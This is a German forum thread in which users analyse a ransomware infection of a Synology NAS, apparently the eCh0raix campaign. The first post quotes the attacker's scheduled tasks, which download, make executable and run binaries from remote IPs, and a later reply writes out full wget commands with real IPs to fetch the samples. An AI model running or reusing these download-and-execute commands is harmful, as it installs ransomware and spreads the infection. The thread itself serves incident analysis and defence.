Forum: PC-Programmierung Synology NAS gehackt


von Fritz (Gast)


Lesenswert?

Hi

Ein Freund hat mir vor einigen Tagen sein Synology NAS in die Hand 
gedrückt, da darauf einige Daten plötzlich verschlüsselt waren und 
offensichtlich gehackt wurde. Bei den entsprechenden Daten war auch 
immer der Hinweis:

"All your data has been locked(crypted).
How to unlock(decrypt) instruction located in this TOR website: 
***onionlink***"


Die wichstigsten Daten konnten wir inzwischen sichern und das NAS 
zurücksetzen. Also alles halb so schlimm. Im Task Manager des NAS waren 
folgende Task definiert:
1
cd /tmp && wget --no-check-certificate -O arm http://183.76.*.*/1/crp_linux_arm;chmod 0777 ./arm;nohup ./arm --syno=true </dev/null >/dev/null 2>&1 &
2
cd /tmp && wget --no-check-certificate -O 386 http://183.76.*.*/1/crp_linux_386;chmod 0777 ./386;nohup ./386 --syno=true </dev/null >/dev/null 2>&1 &
3
cd /tmp && wget --no-check-certificate -O 386 http://98.144.*.*/1/crp_linux_386;chmod 0777 ./386;nohup ./386 --syno=true </dev/null >/dev/null 2>&1 &
4
cd /tmp && wget --no-check-certificate -O arm http://98.144.*.*/1/crp_linux_arm;chmod 0777 ./arm;nohup ./arm --syno=true </dev/null >/dev/null 2>&1 &

kann jemand entschlüsseln was damit angestellt wird?

von (prx) A. K. (prx)


Lesenswert?

Ein Programm wird runtergeladen und ausgeführt.
Sind die Wildcards von dir?

: Bearbeitet durch User
von Andreas M. (amesser)


Lesenswert?

Fritz schrieb:
> kann jemand entschlüsseln was damit angestellt wird?

Das lädt die Malware runter und führt sie aus. Gibt doch mal die volle 
IP Adresse an. Eventuell kann dann jemand das Binary mal untersuchen.

Wenn das so im Task-Manager stand, dann wurde de NAS nicht "gehackt" 
sondern war einfach beschissen abgesichert. (Passwörter...) Ins Inet 
freigegeben? Schlecht abgesichertes WLAN?

von Oliver S. (oliverso)


Lesenswert?


von Fritz (Gast)


Lesenswert?

(prx) A. K. schrieb:
> Sind die Wildcards von dir?
jup



Andreas M. schrieb:
> Ins Inet
> freigegeben?
jup. Benutzername admin, password admin und zudem alle relevanten Ports 
freigeschaltet kopfschüttel



Andreas M. schrieb:
> Gibt doch mal die volle
> IP Adresse an.
*.76.46.30
*.144.56.47

wenn jemand wirklich interesse hat, mutig ist und weiß was er tut, 
einfach mit den IPs aus dem ersten Post kombinieren :)

von Andras H. (kyrk)


Lesenswert?

Zu Hause werde ich sofort mein Ghidra scharf machen und die Dinger 
angucken :)

von Andreas B. (bitverdreher)


Lesenswert?

Nur mal um sicherzugehen (damit es nicht ausführbar gemacht wird):
wget --no-check-certificate http://183.76.46.30/1/crp_linux_arm
wget --no-check-certificate http://183.76.46.30/1/crp_linux_386

wget --no-check-certificate http://98.144.56.47/1/crp_linux_arm
wget --no-check-certificate http://98.144.56.47/1/crp_linux_386

Das sind 2 verschiedene  Server mit offensichtlich der gleichen Datei 
(einmal Japan, einmal US Westküste) für beide Plattformen.

von tt2t (Gast)


Lesenswert?

Mal nachsehen:
1
$ whois 183.76.46.30
2
% [whois.apnic.net]
3
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html
4
5
% Information related to '183.76.0.0 - 183.77.255.255'
6
7
% Abuse contact for '183.76.0.0 - 183.77.255.255' is 'hostmaster@nic.ad.jp'
8
9
inetnum:        183.76.0.0 - 183.77.255.255
10
netname:        ASAHI-NET
11
descr:          ASAHI Net,Inc.
12
descr:          KABUKIZA TOWER 21F, Ginza 4-12-15 Chuo-ku, Tokyo
13
country:        JP
14
admin-c:        JNIC1-AP
15
tech-c:         JNIC1-AP
16
status:         ALLOCATED PORTABLE
17
remarks:        Email address for spam or abuse complaints : abuse@asahi-net.or.jp
18
mnt-irt:        IRT-JPNIC-JP
19
mnt-by:         MAINT-JPNIC
20
mnt-lower:      MAINT-JPNIC
21
last-modified:  2021-01-28T01:12:30Z
22
source:         APNIC
23
24
irt:            IRT-JPNIC-JP
25
address:        Urbannet-Kanda Bldg 4F, 3-6-2 Uchi-Kanda
26
address:        Chiyoda-ku, Tokyo 101-0047, Japan
27
e-mail:         hostmaster@nic.ad.jp
28
abuse-mailbox:  hostmaster@nic.ad.jp
29
admin-c:        JNIC1-AP
30
tech-c:         JNIC1-AP
31
auth:           # Filtered
32
remarks:        hostmaster@nic.ad.jp was validated on 2020-07-23
33
mnt-by:         MAINT-JPNIC
34
last-modified:  2021-06-15T05:18:06Z
35
source:         APNIC
36
37
role:           Japan Network Information Center
38
address:        Urbannet-Kanda Bldg 4F
39
address:        3-6-2 Uchi-Kanda
40
address:        Chiyoda-ku, Tokyo 101-0047,Japan
41
country:        JP
42
phone:          +81-3-5297-2311
43
fax-no:         +81-3-5297-2312
44
e-mail:         hostmaster@nic.ad.jp
45
admin-c:        JI13-AP
46
tech-c:         JE53-AP
47
nic-hdl:        JNIC1-AP
48
mnt-by:         MAINT-JPNIC
49
last-modified:  2021-06-15T05:14:02Z
50
source:         APNIC
51
52
% Information related to '183.76.0.0 - 183.77.255.255'
53
54
inetnum:        183.76.0.0 - 183.77.255.255
55
netname:        ASAHI-NET-CIDR-BLK-JP
56
descr:          ASAHI Net,Inc.
57
remarks:        Email address for spam or abuse complaints : abuse@asahi-net.or.jp
58
country:        JP
59
admin-c:        JP00057756
60
tech-c:         JP00057756
61
remarks:        This information has been partially mirrored by APNIC from
62
remarks:        JPNIC. To obtain more specific information, please use the
63
remarks:        JPNIC WHOIS Gateway at
64
remarks:        http://www.nic.ad.jp/en/db/whois/en-gateway.html or
65
remarks:        whois.nic.ad.jp for WHOIS client. (The WHOIS client
66
remarks:        defaults to Japanese output, use the /e switch for English
67
remarks:        output)
68
last-modified:  2021-01-28T18:56:03Z
69
source:         JPNIC
70
71
% This query was served by the APNIC Whois Service version 1.88.15-SNAPSHOT (WHOIS-UK3)

... und ...
1
$ whois 98.144.56.47
2
3
#
4
# ARIN WHOIS data and services are subject to the Terms of Use
5
# available at: https://www.arin.net/resources/registry/whois/tou/
6
#
7
# If you see inaccuracies in the results, please report at
8
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
9
#
10
# Copyright 1997-2021, American Registry for Internet Numbers, Ltd.
11
#
12
13
14
NetRange:       98.144.0.0 - 98.157.255.255
15
CIDR:           98.156.0.0/15, 98.152.0.0/14, 98.144.0.0/13
16
NetName:        RRWE
17
NetHandle:      NET-98-144-0-0-1
18
Parent:         NET98 (NET-98-0-0-0-0)
19
NetType:        Direct Allocation
20
OriginAS:       
21
Organization:   Charter Communications Inc (CC-3517)
22
RegDate:        2007-12-18
23
Updated:        2009-12-11
24
Ref:            https://rdap.arin.net/registry/ip/98.144.0.0
25
26
27
OrgName:        Charter Communications Inc
28
OrgId:          CC-3517
29
Address:        6399 S. Fiddler's Green Circle
30
City:           Greenwood Village
31
StateProv:      CO
32
PostalCode:     80111
33
Country:        US
34
RegDate:        2018-10-10
35
Updated:        2021-03-30
36
Comment:        Legacy Time Warner Cable IP Assets
37
Ref:            https://rdap.arin.net/registry/entity/CC-3517
38
39
40
OrgTechHandle: IPADD1-ARIN
41
OrgTechName:   IPAddressing
42
OrgTechPhone:  +1-720-536-1278 
43
OrgTechEmail:  PublicIPAddressing@charter.com
44
OrgTechRef:    https://rdap.arin.net/registry/entity/IPADD1-ARIN
45
46
OrgAbuseHandle: IPADD1-ARIN
47
OrgAbuseName:   IPAddressing
48
OrgAbusePhone:  +1-720-536-1278 
49
OrgAbuseEmail:  PublicIPAddressing@charter.com
50
OrgAbuseRef:    https://rdap.arin.net/registry/entity/IPADD1-ARIN
51
52
53
#
54
# ARIN WHOIS data and services are subject to the Terms of Use
55
# available at: https://www.arin.net/resources/registry/whois/tou/
56
#
57
# If you see inaccuracies in the results, please report at
58
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
59
#
60
# Copyright 1997-2021, American Registry for Internet Numbers, Ltd.
61
#

von Oliver S. (oliverso)


Lesenswert?

Da steht wahrscheinlich ein gehacktes Synology-NAS, was dann die Dateien 
ausliefert.

Oliver

von Hmmm (Gast)


Lesenswert?

tt2t schrieb:
> Mal nachsehen:
> 1$ whois 183.76.46.30

Völlig irrelevant. Das sind beides Adressen aus dynamischen Pools, 
vermutlich ebenfalls mit dieser Malware befallen.

Bei den Exploit-Versuchen, die ich so in Logfiles sehe, soll meistens 
Mozi.a oder Mozi.m nachgeladen werden - und zwar vom angreifenden Host, 
und wenn der hinter einem NAT-Gateway steht, taucht in der wget-URL auch 
mal eine RFC1918-Adresse auf.

von tt2t (Gast)


Lesenswert?

Hmmm schrieb:
> Völlig irrelevant. Das sind beides Adressen aus dynamischen Pools,
> vermutlich ebenfalls mit dieser Malware befallen.

dynamische Pools glaube ich nicht, denn die können sich ändern und sind 
nicht vorhersehbar.

Befallen: ziemlich sicher. Der Besitzer des NAS, Freund des TO, sollte 
mal eine abuse-Mitteilung an die Provider schicken, die eMail-Adressen 
stehen ja in der whois-Mitteilung

von tt2t (Gast)


Lesenswert?

Die 98.144.56.47 ist down, nicht mal ein ping geht

von tt2t (Gast)


Lesenswert?

Das scheint schon eine alte Sache zu sein, die Suche nach crp_linux_arm 
und crp_linux_386 führt u.a. zu 
https://www.bleepingcomputer.com/forums/t/617854/ech0raix-ransomware-qnapcryptsynology-nas-encrypt-support-topic/page-24 
aus März 2020

von Hmmm (Gast)


Lesenswert?

tt2t schrieb:
> dynamische Pools glaube ich nicht

30.46.76.183.in-addr.arpa domain name pointer 
ab046030.dynamic.ppp.asahi-net.or.jp.

47.56.144.98.in-addr.arpa domain name pointer 
cpe-98-144-56-47.wi.res.rr.com.

tt2t schrieb:
> denn die können sich ändern

Das ist in dem Zusammenhang egal. Der eingenistete Trojaner sucht sich 
ein neues Opfer und lässt es unmittelbar den Schadcode ziehen, danach 
wird der ohnehin nicht mehr gebraucht.

tt2t schrieb:
> nicht vorhersehbar.

Die Command&Control-Server sind normalerweise andere, da wird oft zu 
Tricks wie nach einem bestimmten Schema generierten Domainnamen 
gegriffen, die die Malware durchprobiert.

tt2t schrieb:
> Der Besitzer des NAS, Freund des TO, sollte
> mal eine abuse-Mitteilung an die Provider schicken, die eMail-Adressen
> stehen ja in der whois-Mitteilung

Bei japanischen Providern ist das nach meiner Erfahrung verschwendete 
Lebenszeit.

von Fritz (Gast)


Lesenswert?

Andras H. schrieb:
> Zu Hause werde ich sofort mein Ghidra scharf machen und die Dinger
> angucken :)

hast du schon Erkenntnisse erlangt?
Mich würd interessieren welche Veschlüsselung angewandt wird bzw. wie 
die Passwörter berechnet oder vergeben werden.

von Manfred (Gast)


Lesenswert?

tt2t schrieb:
> Die 98.144.56.47 ist down, nicht mal ein ping geht

Ein ganz kluger Hinweis.
Pings zu 192.53.103.103,
192.53.103.182,
192.53.103.134
funktionieren auch nicht, obwohl die Server sich bester Gesundheit 
erfreuen.

Bitte melde dich an um einen Beitrag zu schreiben. Anmeldung ist kostenlos und dauert nur eine Minute.
Bestehender Account
Schon ein Account bei Google/GoogleMail? Keine Anmeldung erforderlich!
Mit Google-Account einloggen
Noch kein Account? Hier anmelden.